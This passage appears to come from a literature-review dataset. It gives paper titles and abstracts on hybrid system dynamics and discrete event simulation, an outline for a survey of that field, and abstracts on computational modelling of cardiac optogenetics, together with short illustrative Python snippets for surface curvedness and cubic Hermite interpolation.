(SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Enterprise scheduling: Hybrid and hierarchical issues paper_content: We build a hybrid discrete-continuous simulation model of the manufacturing enterprise system. This model consists of an overall system dynamics model of the manufacturing enterprise and connected to it are a number of discrete event simulations for selected operational and tactical functions. 
System dynamics modeling best fits the macroscopic nature of activities at the higher management levels while the discrete models best fit the microscopic nature of the operational and tactical levels. An advanced mechanism based on information theory is used for the integration of the different simulation modeling modalities. In addition, the impact of the decisions at the factory level in scheduling are analyzed at the management level. The different models of control are discussed. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. --- paper_title: Applicability of hybrid simulation to different modes of governance in UK healthcare paper_content: Healthcare organizations exhibit both detailed and dynamic complexity. Effective and sustainable decision-making in healthcare requires tools that can comprehend this complexity. Discrete event simulation (DES) due to its ability to capture detail complexity is widely used for operational decision making. However at the strategic level, System Dynamics (SD) with its focus on a holistic perspective and its ability to comprehend dynamic complexity has advantages over DES. Appreciating the complexity of healthcare, the authors have proposed the use of hybrid simulation in healthcare. As argued previously, effective decision making require tools which are capable of comprehending both detail and dynamic interactions of healthcare. The interactions in the organizations are governed by the governance design. In appreciation of that argument the authors have described the applicability of a hybrid approach to various modes of governance in UK healthcare. ---
Title: COMBINING SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATIONS - OVERVIEW OF HYBRID SIMULATION MODELS
Section 1: INTRODUCTION
Description 1: This section introduces the advances in Industrial Engineering, the role of computers in simulation and modelling, and sets the context for combining System Dynamics and Discrete Event Simulation.
Section 2: SYSTEM DYNAMICS
Description 2: This section explains what System Dynamics (SD) is, its principles, modelling techniques, and the limitations encountered when applying SD in specific scenarios.
Section 3: DISCRETE EVENT SIMULATION
Description 3: This section discusses Discrete Event Simulation (DES), its principles, the areas of application, and its strengths and weaknesses.
Section 4: COMPARISON
Description 4: This section provides a comparative analysis between System Dynamics and Discrete Event Simulation, highlighting their differences and suitability for various types of modelling tasks.
Section 5: COMBINING TWO MODELLING TECHNIQUES
Description 5: This section explores the concept of hybrid models combining SD and DES, including examples of how these hybrid models are applied in different industries and the benefits they offer.
Section 6: Area/industry of application
Description 6: This section provides specific examples of hybrid models applied in various industries, discussing their design and the problems they solve.
Section 7: Type of connection
Description 7: This section details how hybrid models are connected, the communication between the models, and the tools and techniques used to integrate them.
Section 8: Scope of the hybrid model
Description 8: This section addresses the scope of hybrid models, including their application within organizational contexts and specific functional areas.
Section 9: Dependent/independent models inside hybrid model
Description 9: This section examines whether the models in a hybrid setup are dependent or independent of each other and discusses the practical implications of each scenario.
Section 10: Type of hybrid model format
Description 10: This section categorizes hybrid models based on their format of communication and integration, and reviews the different approaches taken by various studies.
Section 11: EXAMPLE / CASE
Description 11: This section presents a specific case study or example of a hybrid model being developed, including the objectives, design, and functioning of the model.
Section 12: CONCLUSION
Description 12: This section summarizes the key points discussed in the paper, the justification for using hybrid models, and their importance in accurately representing complex real-world scenarios.
Computational modeling of cardiac optogenetics: Methodology overview & review of findings from simulations
10
--- paper_title: Tachycardia in Post-Infarction Hearts: Insights from 3D Image-Based Ventricular Models paper_content: Ventricular tachycardia, a life-threatening regular and repetitive fast heart rhythm, frequently occurs in the setting of myocardial infarction. Recently, the peri-infarct zones surrounding the necrotic scar (termed gray zones) have been shown to correlate with ventricular tachycardia inducibility. However, it remains unknown how the latter is determined by gray zone distribution and size. The goal of this study is to examine how tachycardia circuits are maintained in the infarcted heart and to explore the relationship between the tachycardia organizing centers and the infarct gray zone size and degree of heterogeneity. To achieve the goals of the study, we employ a sophisticated high-resolution electrophysiological model of the infarcted canine ventricles reconstructed from imaging data, representing both scar and gray zone. The baseline canine ventricular model was also used to generate additional ventricular models with different gray zone sizes, as well as models in which the gray zone was represented as different heterogeneous combinations of viable tissue and necrotic scar. The results of the tachycardia induction simulations with a number of high-resolution canine ventricular models (22 altogether) demonstrated that the gray zone was the critical factor resulting in arrhythmia induction and maintenance. In all models with inducible arrhythmia, the scroll-wave filaments were contained entirely within the gray zone, regardless of its size or the level of heterogeneity of its composition. The gray zone was thus found to be the arrhythmogenic substrate that promoted wavebreak and reentry formation. We found that the scroll-wave filament locations were insensitive to the structural composition of the gray zone and were determined predominantly by the gray zone morphology and size. The findings of this study have important implications for the advancement of improved criteria for stratifying arrhythmia risk in post-infarction patients and for the development of new approaches for determining the ablation targets of infarct-related tachycardia. --- paper_title: Stimulating Cardiac Muscle by Light: Cardiac Optogenetics by Cell Delivery paper_content: Background —After the recent cloning of light-sensitive ion channels and their expression in mammalian cells, a new field, optogenetics, emerged in neuroscience, allowing for precise perturbations of neural circuits by light. However, functionality of optogenetic tools has not been fully explored outside neuroscience; and a non-viral, non-embryogenesis based strategy for optogenetics has not been shown before. ::: ::: Methods and Results —We demonstrate the utility of optogenetics to cardiac muscle by a tandem cell unit (TCU) strategy, where non-excitable cells carry exogenous light-sensitive ion channels, and when electrically coupled to cardiomyocytes, produce optically-excitable heart tissue. A stable channelrhodopsin2 (ChR2) expressing cell line was developed, characterized and used as a cell delivery system. The TCU strategy was validated in vitro in cell pairs with adult canine myocytes (for a wide range of coupling strengths) and in cardiac syncytium with neonatal rat cardiomyocytes. 
For the first time, we combined optical excitation and optical imaging to capture light-triggered muscle contractions and high-resolution propagation maps of light-triggered electrical waves, found to be quantitatively indistinguishable from electrically-triggered waves. ::: ::: Conclusions —Our results demonstrate feasibility to control excitation and contraction in cardiac muscle by light using the TCU approach. Optical pacing in this case uses less energy, offers superior spatiotemporal control, remote access and can serve not only as an elegant tool in arrhythmia research, but may form the basis for a new generation of light-driven cardiac pacemakers and muscle actuators. The TCU strategy is extendable to (non-viral) stem cell therapy and is directly relevant to in vivo applications. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Methodology for image-based reconstruction of ventricular geometry for patient-specific modeling of cardiac electrophysiology. paper_content: Patient-specific modeling of ventricular electrophysiology requires an interpolated reconstruction of the 3-dimensional (3D) geometry of the patient ventricles from the low-resolution (Lo-res) clinical images. The goal of this study was to implement a processing pipeline for obtaining the interpolated reconstruction, and thoroughly evaluate the efficacy of this pipeline in comparison with alternative methods. The pipeline implemented here involves contouring the epi- and endocardial boundaries in Lo-res images, interpolating the contours using the variational implicit functions method, and merging the interpolation results to obtain the ventricular reconstruction. Five alternative interpolation methods, namely linear, cubic spline, spherical harmonics, cylindrical harmonics, and shape-based interpolation were implemented for comparison. In the thorough evaluation of the processing pipeline, Hi-res magnetic resonance (MR), computed tomography (CT), and diffusion tensor (DT) MR images from numerous hearts were used. Reconstructions obtained from the Hi-res images were compared with the reconstructions computed by each of the interpolation methods from a sparse sample of the Hi-res contours, which mimicked Lo-res clinical images. 
Qualitative and quantitative comparison of these ventricular geometry reconstructions showed that the variational implicit functions approach performed better than others. Additionally, the outcomes of electrophysiological simulations (sinus rhythm activation maps and pseudo-ECGs) conducted using models based on the various reconstructions were compared. These electrophysiological simulations demonstrated that our implementation of the variational implicit functions-based method had the best accuracy. --- paper_title: Channelrhodopsin-2, a directly light-gated cation-selective membrane channel paper_content: Microbial-type rhodopsins are found in archaea, prokaryotes, and eukaryotes. Some of them represent membrane ion transport proteins such as bacteriorhodopsin, a light-driven proton pump, or channelrhodopsin-1 (ChR1), a recently identified light-gated proton channel from the green alga Chlamydomonas reinhardtii. ChR1 and ChR2, a related microbial-type rhodopsin from C. reinhardtii, were shown to be involved in generation of photocurrents of this green alga. We demonstrate by functional expression, both in oocytes of Xenopus laevis and mammalian cells, that ChR2 is a directly light-switched cation-selective ion channel. This channel opens rapidly after absorption of a photon to generate a large permeability for monovalent and divalent cations. ChR2 desensitizes in continuous light to a smaller steady-state conductance. Recovery from desensitization is accelerated by extracellular H+ and negative membrane potential, whereas closing of the ChR2 ion channel is decelerated by intracellular H+. ChR2 is expressed mainly in C. reinhardtii under low-light conditions, suggesting involvement in photoreception in dark-adapted cells. The predicted seven-transmembrane alpha helices of ChR2 are characteristic for G protein-coupled receptors but reflect a different motif for a cation-selective ion channel. Finally, we demonstrate that ChR2 may be used to depolarize small or large cells, simply by illumination. --- paper_title: Length-dependent tension in the failing heart and the efficacy of cardiac resynchronization therapy paper_content: Aims Cardiac resynchronization therapy (CRT) has emerged as one of the few effective and safe treatments for heart failure. However, identifying patients that will benefit from CRT remains controversial. The dependence of CRT efficacy on organ and cellular scale mechanisms was investigated in a patient-specific computer model to identify novel patient selection criteria. ::: ::: Methods and results A biophysically based patient-specific coupled electromechanics heart model has been developed which links the cellular and sub-cellular mechanisms which regulate cardiac function to the whole organ function observed clinically before and after CRT. A sensitivity analysis of the model identified lack of length dependence of tension regulation within the sarcomere as a significant contributor to the efficacy of CRT. Further simulation analysis demonstrated that in the whole heart, length-dependent tension development is key not only for the beat-to-beat regulation of stroke volume (Frank–Starling mechanism), but also the homogenization of tension development and strain. ::: ::: Conclusions In individuals with effective Frank–Starling mechanism, the length dependence of tension facilitates the homogenization of stress and strain. This can result in synchronous contraction despite asynchronous electrical activation. 
In these individuals, synchronizing electrical activation through CRT may have minimal benefit. --- paper_title: Millisecond-timescale, genetically targeted optical control of neural activity paper_content: Temporally precise, noninvasive control of activity in well-defined neuronal populations is a long-sought goal of systems neuroscience. We adapted for this purpose the naturally occurring algal protein Channelrhodopsin-2, a rapidly gated light-sensitive cation channel, by using lentiviral gene delivery in combination with high-speed optical switching to photostimulate mammalian neurons. We demonstrate reliable, millisecond-timescale control of neuronal spiking, as well as control of excitatory and inhibitory synaptic transmission. This technology allows the use of light to alter neural processing at the level of single spikes and synaptic events, yielding a widely applicable tool for neuroscientists and biomedical engineers. --- paper_title: Molecular and Cellular Approaches for Diversifying and Extending Optogenetics paper_content: Optogenetic technologies employ light to control biological processes within targeted cells in vivo with high temporal precision. Here, we show that application of molecular trafficking principles can expand the optogenetic repertoire along several long-sought dimensions. Subcellular and transcellular trafficking strategies now permit (1) optical regulation at the far-red/infrared border and extension of optogenetic control across the entire visible spectrum, (2) increased potency of optical inhibition without increased light power requirement (nanoampere-scale chloride-mediated photocurrents that maintain the light sensitivity and reversible, step-like kinetic stability of earlier tools), and (3) generalizable strategies for targeting cells based not only on genetic identity, but also on morphology and tissue topology, to allow versatile targeting when promoters are not known or in genetically intractable organisms. Together, these results illustrate use of cell-biological principles to enable expansion of the versatile fast optogenetic technologies suitable for intact-systems biology and behavior. --- paper_title: "Beauty is a light in the heart": the transformative potential of optogenetics for clinical applications in cardiovascular medicine. paper_content: Optogenetics is an exciting new technology in which viral gene or cell delivery is used to inscribe light sensitivity in excitable tissue to enable optical control of bioelectric behavior. Initial progress in the fledgling domain of cardiac optogenetics has included in vitro expression of various light-sensitive proteins in cell monolayers and transgenic animals to demonstrate an array of potentially useful applications, including light-based pacing, silencing of spontaneous activity, and spiral wave termination. In parallel to these developments, the cardiac modeling community has developed a versatile computational framework capable of realistically simulating optogenetics in biophysically detailed, patient-specific representations of the human heart, enabling the exploration of potential clinical applications in a predictive virtual platform. 
Toward the ultimate goal of assessing the feasibility and potential impact of optogenetics-based therapies in cardiovascular medicine, this review provides (1) a detailed synopsis of in vivo, in vitro, and in silico developments in the field and (2) a critical assessment of how existing clinical technology for gene/cell delivery and intra-cardiac illumination could be harnessed to achieve such lofty goals as light-based arrhythmia termination. --- paper_title: Modulation of cardiac tissue electrophysiological properties with light-sensitive proteins. paper_content: AIMS ::: Optogenetics approaches, utilizing light-sensitive proteins, have emerged as unique experimental paradigms to modulate neuronal excitability. We aimed to evaluate whether a similar strategy could be used to control cardiac-tissue excitability. ::: ::: ::: METHODS AND RESULTS ::: A combined cell and gene therapy strategy was developed in which fibroblasts were transfected to express the light-activated depolarizing channel Channelrhodopsin-2 (ChR2). Patch-clamp studies confirmed the development of a robust inward current in the engineered fibroblasts following monochromatic blue-light exposure. The engineered cells were co-cultured with neonatal rat cardiomyocytes (or human embryonic stem cell-derived cardiomyocytes) and studied using a multielectrode array mapping technique. These studies revealed the ability of the ChR2-fibroblasts to electrically couple and pace the cardiomyocyte cultures at varying frequencies in response to blue-light flashes. Activation mapping pinpointed the source of this electrical activity to the engineered cells. Similarly, diffuse seeding of the ChR2-fibroblasts allowed multisite optogenetics pacing of the co-cultures, significantly shortening their electrical activation time and synchronizing contraction. Next, optogenetics pacing in an in vitro model of conduction block allowed the resynchronization of the tissue's electrical activity. Finally, the ChR2-fibroblasts were transfected to also express the light-sensitive hyperpolarizing proton pump Archaerhodopsin-T (Arch-T). Seeding of the ChR2/ArchT-fibroblasts allowed to either optogentically pace the cultures (in response to blue-light flashes) or completely suppress the cultures' electrical activity (following continuous illumination with 624 nm monochromatic light, activating ArchT). ::: ::: ::: CONCLUSIONS ::: The results of this proof-of-concept study highlight the unique potential of optogenetics for future biological pacemaking and resynchronization therapy applications and for the development of novel anti-arrhythmic strategies. --- paper_title: Optogenetic control of heart muscle in vitro and in vivo paper_content: Stimulation of the light-activated cation channel channelrhodopsin-2 can depolarize heart muscle in vitro and in vivo, resulting in precise localized stimulation and constant prolonged depolarization of genetically targeted cardiomyocytes and cardiac tissue. --- paper_title: Image-based left ventricular shape analysis for sudden cardiac death risk stratification. paper_content: BACKGROUND ::: Low left ventricular ejection fraction (LVEF), the main criterion used in the current clinical practice to stratify sudden cardiac death (SCD) risk, has low sensitivity and specificity. ::: ::: ::: OBJECTIVE ::: To uncover indices of left ventricular (LV) shape that differ between patients with a high risk of SCD and those with a low risk. 
::: ::: ::: METHODS ::: By using clinical cardiac magnetic resonance imaging and computational anatomy tools, a novel computational framework to compare 3-dimensional LV endocardial surface curvedness, wall thickness, and relative wall thickness between patient groups was implemented. The framework was applied to cardiac magnetic resonance data of 61 patients with ischemic cardiomyopathy who were selected for prophylactic implantable cardioverter-defibrillator treatment on the basis of reduced LVEF. The patients were classified by outcome: group 0 had no events; group 1, arrhythmic events; and group 2, heart failure events. Segmental differences in LV shape were assessed. ::: ::: ::: RESULTS ::: Global LV volumes and mass were similar among groups. Compared with patients with no events, patients in groups 1 and 2 had lower mean shape metrics in all coronary artery regions, with statistical significance in 9 comparisons, reflecting wall thinning and stretching/flattening. ::: ::: ::: CONCLUSION ::: In patients with ischemic cardiomyopathy and low LVEF, there exist quantifiable differences in 3-dimensional endocardial surface curvedness, LV wall thickness, and LV relative wall thickness between those with no clinical events and those with arrhythmic or heart failure outcomes, reflecting adverse LV remodeling. This retrospective study is a proof of concept to demonstrate that regional LV remodeling indices have the potential to improve the personalized risk assessment for SCD. --- paper_title: Cardiac applications of optogenetics. paper_content: In complex multicellular systems, such as the brain or the heart, the ability to selectively perturb and observe the response of individual components at the cellular level and with millisecond resolution in time, is essential for mechanistic understanding of function. Optogenetics uses genetic encoding of light sensitivity (by the expression of microbial opsins) to provide such capabilities for manipulation, recording, and control by light with cell specificity and high spatiotemporal resolution. As an optical approach, it is inherently scalable for remote and parallel interrogation of biological function at the tissue level; with implantable miniaturized devices, the technique is uniquely suitable for in vivo tracking of function, as illustrated by numerous applications in the brain. Its expansion into the cardiac area has been slow. Here, using examples from published research and original data, we focus on optogenetics applications to cardiac electrophysiology, specifically dealing with the ability to manipulate membrane voltage by light with implications for cardiac pacing, cardioversion, cell communication, and arrhythmia research, in general. We discuss gene and cell delivery methods of inscribing light sensitivity in cardiac tissue, functionality of the light-sensitive ion channels within different types of cardiac cells, utility in probing electrical coupling between different cell types, approaches and design solutions to all-optical electrophysiology by the combination of optogenetic sensors and actuators, and specific challenges in moving towards in vivo cardiac optogenetics. 
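Referring back to the image-based left ventricular shape analysis entry above: the abstract does not give the exact pipeline used to compute the reported metrics, but curvedness of a surface is a standard differential-geometry quantity obtained from the principal curvatures. The snippet below is a sketch of that textbook definition only, with random placeholder curvature arrays standing in for values estimated from a segmented MR endocardial surface.

```python
import numpy as np

def principal_curvatures(H, K):
    """Principal curvatures k1 >= k2 from mean (H) and Gaussian (K) curvature."""
    disc = np.sqrt(np.maximum(H**2 - K, 0.0))  # clamp negatives from noisy curvature estimates
    return H + disc, H - disc

def curvedness(k1, k2):
    """Koenderink-van Doorn curvedness: magnitude of local surface bending."""
    return np.sqrt((k1**2 + k2**2) / 2.0)

# Placeholder per-vertex mean/Gaussian curvature arrays for an endocardial surface mesh
H = np.random.uniform(-0.2, 0.2, size=1000)    # 1/mm
K = np.random.uniform(-0.02, 0.02, size=1000)  # 1/mm^2
k1, k2 = principal_curvatures(H, K)
print("mean endocardial curvedness:", curvedness(k1, k2).mean())
```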
--- paper_title: Multiple-Color Optical Activation, Silencing, and Desynchronization of Neural Activity, with Single-Spike Temporal Resolution paper_content: The quest to determine how precise neural activity patterns mediate computation, behavior, and pathology would be greatly aided by a set of tools for reliably activating and inactivating genetically targeted neurons, in a temporally precise and rapidly reversible fashion. Having earlier adapted a light-activated cation channel, channelrhodopsin-2 (ChR2), for allowing neurons to be stimulated by blue light, we searched for a complementary tool that would enable optical neuronal inhibition, driven by light of a second color. Here we report that targeting the codon-optimized form of the light-driven chloride pump halorhodopsin from the archaebacterium Natronomas pharaonis (hereafter abbreviated Halo) to genetically-specified neurons enables them to be silenced reliably, and reversibly, by millisecond-timescale pulses of yellow light. We show that trains of yellow and blue light pulses can drive high-fidelity sequences of hyperpolarizations and depolarizations in neurons simultaneously expressing yellow light-driven Halo and blue light-driven ChR2, allowing for the first time manipulations of neural synchrony without perturbation of other parameters such as spiking rates. The Halo/ChR2 system thus constitutes a powerful toolbox for multichannel photoinhibition and photostimulation of virally or transgenically targeted neural circuits without need for exogenous chemicals, enabling systematic analysis and engineering of the brain, and quantitative bioengineering of excitable cells. --- paper_title: Channelrhodopsin-2 and optical control of excitable cells paper_content: Electrically excitable cells are important in the normal functioning and in the pathophysiology of many biological processes. These cells are typically embedded in dense, heterogeneous tissues, rendering them difficult to target selectively with conventional electrical stimulation methods. The algal protein Channelrhodopsin-2 offers a new and promising solution by permitting minimally invasive, genetically targeted and temporally precise photostimulation. Here we explore technological issues relevant to the temporal precision, spatial targeting and physiological implementation of ChR2, in the context of other photostimulation approaches to optical control of excitable cells. --- paper_title: Cardiac optogenetics paper_content: Optogenetics is an emerging technology for optical interrogation and control of biological function with high specificity and high spatiotemporal resolution. Mammalian cells and tissues can be sensitized to respond to light by a relatively simple and well-tolerated genetic modification using microbial opsins (light-gated ion channels and pumps). These can achieve fast and specific excitatory or inhibitory response, offering distinct advantages over traditional pharmacological or electrical means of perturbation. Since the first demonstrations of utility in mammalian cells (neurons) in 2005, optogenetics has spurred immense research activity and has inspired numerous applications for dissection of neural circuitry and understanding of brain function in health and disease, applications ranging from in vitro to work in behaving animals. Only recently (since 2010), the field has extended to cardiac applications with less than a dozen publications to date. 
In consideration of the early phase of work on cardiac optogenetics and the impact of the technique in understanding another excitable tissue, the brain, this review is largely a perspective of possibilities in the heart. It covers the basic principles of operation of light-sensitive ion channels and pumps, the available tools and ongoing efforts in optimizing them, overview of neuroscience use, as well as cardiac-specific questions of implementation and ideas for best use of this emerging technology in the heart. --- paper_title: High-performance genetically targetable optical neural silencing by light-driven proton pumps paper_content: If the activity of genetically specified neurons is silenced in a temporally precise fashion, the roles of different cell classes in neural processes can be studied. Members of the class of light-driven outward proton pumps are now shown to mediate powerful, safe, multiple-colour silencing of neural activity. The gene archaerhodopsin-3 (Arch) enables near 100% silencing of neurons in the awake brain when virally expressed in the mouse cortex and illuminated with yellow light. --- paper_title: See the light: can optogenetics restore healthy heartbeats? And, if it can, is it really worth the effort? paper_content: Cardiac optogenetics is an exciting new methodology in which light-sensitive ion channels are expressed in heart tissue to enable optical control of bioelectricity. This technology has the potential to open new avenues for safely and effectively treating rhythm disorders in the heart with gentle beams of light. Recently, we developed a comprehensive framework for modeling cardiac optogenetics. Simulations conducted in this platform will provide insights to guide in vitro investigation and steer the development of therapeutic applications - these are the first steps toward clinical translation. In this editorial, we review literature relevant to light-sensitive protein delivery and intracardiac illumination to provide a holistic feasibility assessment for optogenetics-based arrhythmia termination therapy. We then draw on examples from computational work to show that the optical control paradigm has undeniable advantages that cannot be attained with conventional electrotherapy. Hence, we argue that cardiac optogenetics is more than a flashy substitute for current approaches. --- paper_title: Feasibility of image-based simulation to estimate ablation target in human ventricular arrhythmia. paper_content: BACKGROUND ::: Previous studies suggest that magnetic resonance imaging with late gadolinium enhancement (LGE) may identify slowly conducting tissues in scar-related ventricular tachycardia (VT). ::: ::: ::: OBJECTIVE ::: To test the feasibility of image-based simulation based on LGE to estimate ablation targets in VT. ::: ::: ::: METHODS ::: We conducted a retrospective study in 13 patients who had preablation magnetic resonance imaging for scar-related VT ablation. We used image-based simulation to induce VT and estimate target regions according to the simulated VT circuit. The estimated target regions were coregistered with the LGE scar map and the ablation sites from the electroanatomical map in the standard ablation approach. ::: ::: ::: RESULTS ::: In image-based simulation, VT was inducible in 12 (92.3%) patients. All VTs showed macroreentrant propagation patterns, and the narrowest width of estimated target region that an ablation line should span to prevent VT recurrence was 5.0 ± 3.4 mm. 
Of 11 patients who underwent ablation, the results of image-based simulation and the standard approach were consistent in 9 (82%) patients, where ablation within the estimated target region was associated with acute success (n = 8) and ablation outside the estimated target region was associated with failure (n = 1). In 1 (9%) case, the results of image-based simulation and the standard approach were inconsistent, where ablation outside the estimated target region was associated with acute success. ::: ::: ::: CONCLUSIONS ::: The image-based simulation can be used to estimate potential ablation targets of scar-related VT. The image-based simulation may be a powerful noninvasive tool for preprocedural planning of ablation procedures to potentially reduce the procedure time and complication rates. --- paper_title: Image-based models of cardiac structure with applications in arrhythmia and defibrillation studies paper_content: Abstract The objective of this article is to present a set of methods for constructing realistic computational models of cardiac structure from high-resolution structural and diffusion tensor magnetic resonance images and to demonstrate the applicability of the models in simulation studies. The structural image is segmented to identify various regions such as normal myocardium, ventricles, and infarct. A finite element mesh is generated from the processed structural data, and fiber orientations are assigned to the elements. The Purkinje system, when visible, is modeled using linear elements that interconnect a set of manually identified points. The methods were applied to construct 2 different models; and 2 simulation studies, which demonstrate the applicability of the models in the analysis of arrhythmia and defibrillation, were performed. The models represent cardiac structure with unprecedented detail for simulation studies. --- paper_title: An accurate, fast and robust method to generate patient-specific cubic Hermite meshes paper_content: Abstract In-silico continuum simulations of organ and tissue scale physiology often require a discretisation or mesh of the solution domain. Cubic Hermite meshes provide a smooth representation of anatomy that is well-suited for simulating large deformation mechanics. Models of organ mechanics and deformation have demonstrated significant potential for clinical application. However, the production of a personalised mesh from patient’s anatomy using medical images remains a major bottleneck in simulation workflows. To address this issue, we have developed an accurate, fast and automatic method for deriving patient-specific cubic Hermite meshes. The proposed solution customises a predefined template with a fast binary image registration step and a novel cubic Hermite mesh warping constructed using a variational technique. Image registration is used to retrieve the mapping field between the template mesh and the patient images. The variational warping technique then finds a smooth and accurate projection of this field into the basis functions of the mesh. Applying this methodology, cubic Hermite meshes are fitted to the binary description of shape with sub-voxel accuracy and within a few minutes, which is a significant advance over the existing state of the art methods. To demonstrate its clinical utility, a generic cubic Hermite heart biventricular model is personalised to the anatomy of four patients, and the resulting mechanical stability of these customised meshes is successfully demonstrated. 
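The cubic Hermite mesh entry above builds elements whose geometry is interpolated from nodal values and nodal derivatives, which is what gives the smooth, C1-continuous anatomical representation. The sketch below shows only the standard one-dimensional cubic Hermite basis that underlies such elements; full tri-cubic elements take tensor products of these functions in three local coordinates, and the binary image registration and variational warping steps of the cited pipeline are not reproduced here.

```python
import numpy as np

def hermite_basis(xi):
    """1D cubic Hermite basis functions evaluated at local coordinate xi in [0, 1]."""
    h00 = 2 * xi**3 - 3 * xi**2 + 1  # weights nodal value at node 0
    h10 = xi**3 - 2 * xi**2 + xi     # weights nodal derivative at node 0
    h01 = -2 * xi**3 + 3 * xi**2     # weights nodal value at node 1
    h11 = xi**3 - xi**2              # weights nodal derivative at node 1
    return h00, h10, h01, h11

def interpolate_segment(x0, dx0, x1, dx1, xi):
    """C1-continuous interpolation of one element from nodal values and derivatives."""
    h00, h10, h01, h11 = hermite_basis(xi)
    return h00 * x0 + h10 * dx0 + h01 * x1 + h11 * dx1

# Example: smooth curve between two nodes with prescribed slopes (arbitrary demo values)
xi = np.linspace(0.0, 1.0, 11)
print(interpolate_segment(x0=0.0, dx0=1.0, x1=2.0, dx1=0.0, xi=xi))
```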
--- paper_title: Multiple photocycles of channelrhodopsin. paper_content: Two rhodopsins with intrinsic ion conductance have been identified recently in Chlamydomonas reinhardtii. They were named "channelrhodopsins" ChR1 and ChR2. Both were expressed in Xenopus laevis oocytes, and their properties were studied qualitatively by two electrode voltage clamp techniques. ChR1 is specific for H+, whereas ChR2 conducts Na+, K+, Ca2+, and guanidinium. ChR2 responds to the onset of light with a peak conductance, followed by a smaller steady-state conductance. Upon a second stimulation, the peak is smaller and recovers to full size faster at high external pH. ChR1 was reported to respond with a steady-state conductance only but is demonstrated here to have a peak conductance at high light intensities too. We analyzed quantitatively the light-induced conductance of ChR1 and developed a reaction scheme that describes the photocurrent kinetics at various light conditions. ChR1 exists in two dark states, D1 and D2, that photoisomerize to the conducting states M1 and M2, respectively. Dark-adapted ChR1 is completely arrested in D1. M1 converts into D1 within milliseconds but, in addition, equilibrates with the second conducting state M2 that decays to the second dark state D2. Thus, light-adapted ChR1 represents a mixture of D1 and D2. D2 thermally reconverts to D1 in minutes, i.e., much slower than any reaction of the two photocycles. --- paper_title: ReaChR: a red-shifted variant of channelrhodopsin enables deep transcranial optogenetic excitation paper_content: Channelrhodopsins (ChRs) are used to optogenetically depolarize neurons. We engineered a variant of ChR, denoted red-activatable ChR (ReaChR), that is optimally excited with orange to red light (λ ∼590-630 nm) and offers improved membrane trafficking, higher photocurrents and faster kinetics compared to existing red-shifted ChRs. Red light is less scattered by tissue and is absorbed less by blood than the blue to green wavelengths that are required by other ChR variants. We used ReaChR expressed in the vibrissa motor cortex to drive spiking and vibrissa motion in awake mice when excited with red light through intact skull. Precise vibrissa movements were evoked by expressing ReaChR in the facial motor nucleus in the brainstem and illumination with red light through the external auditory canal. Thus, ReaChR enables transcranial optical activation of neurons in deep brain structures without the need to surgically thin the skull, form a transcranial window or implant optical fibers. --- paper_title: Genetically encoded molecular tools for light-driven silencing of targeted neurons paper_content: Abstract The ability to silence, in a temporally precise fashion, the electrical activity of specific neurons embedded within intact brain tissue, is important for understanding the role that those neurons play in behaviors, brain disorders, and neural computations. “Optogenetic” silencers, genetically encoded molecules that, when expressed in targeted cells within neural networks, enable their electrical activity to be quieted in response to pulses of light, are enabling these kinds of causal circuit analyses studies. Two major classes of optogenetic silencer are in broad use in species ranging from worm to monkey: light-driven inward chloride pumps, or halorhodopsins, and light-driven outward proton pumps, such as archaerhodopsins and fungal light-driven proton pumps. 
Both classes of molecule, when expressed in neurons via viral or other transgenic means, enable the targeted neurons to be hyperpolarized by light. We here review the current status of these sets of molecules, and discuss how they are being discovered and engineered. We also discuss their expression properties, ionic properties, spectral characteristics, and kinetics. Such tools may not only find many uses in the quieting of electrical activity for basic science studies but may also, in the future, find clinical uses for their ability to safely and transiently shut down cellular electrical activity in a precise fashion. --- paper_title: Channelrhodopsin-2, a directly light-gated cation-selective membrane channel paper_content: Microbial-type rhodopsins are found in archaea, prokaryotes, and eukaryotes. Some of them represent membrane ion transport proteins such as bacteriorhodopsin, a light-driven proton pump, or channelrhodopsin-1 (ChR1), a recently identified light-gated proton channel from the green alga Chlamydomonas reinhardtii. ChR1 and ChR2, a related microbial-type rhodopsin from C. reinhardtii, were shown to be involved in generation of photocurrents of this green alga. We demonstrate by functional expression, both in oocytes of Xenopus laevis and mammalian cells, that ChR2 is a directly light-switched cation-selective ion channel. This channel opens rapidly after absorption of a photon to generate a large permeability for monovalent and divalent cations. ChR2 desensitizes in continuous light to a smaller steady-state conductance. Recovery from desensitization is accelerated by extracellular H+ and negative membrane potential, whereas closing of the ChR2 ion channel is decelerated by intracellular H+. ChR2 is expressed mainly in C. reinhardtii under low-light conditions, suggesting involvement in photoreception in dark-adapted cells. The predicted seven-transmembrane alpha helices of ChR2 are characteristic for G protein-coupled receptors but reflect a different motif for a cation-selective ion channel. Finally, we demonstrate that ChR2 may be used to depolarize small or large cells, simply by illumination. --- paper_title: Optical mapping of optogenetically shaped cardiac action potentials paper_content: Light-mediated silencing and stimulation of cardiac excitability, an important complement to electrical stimulation, promises important 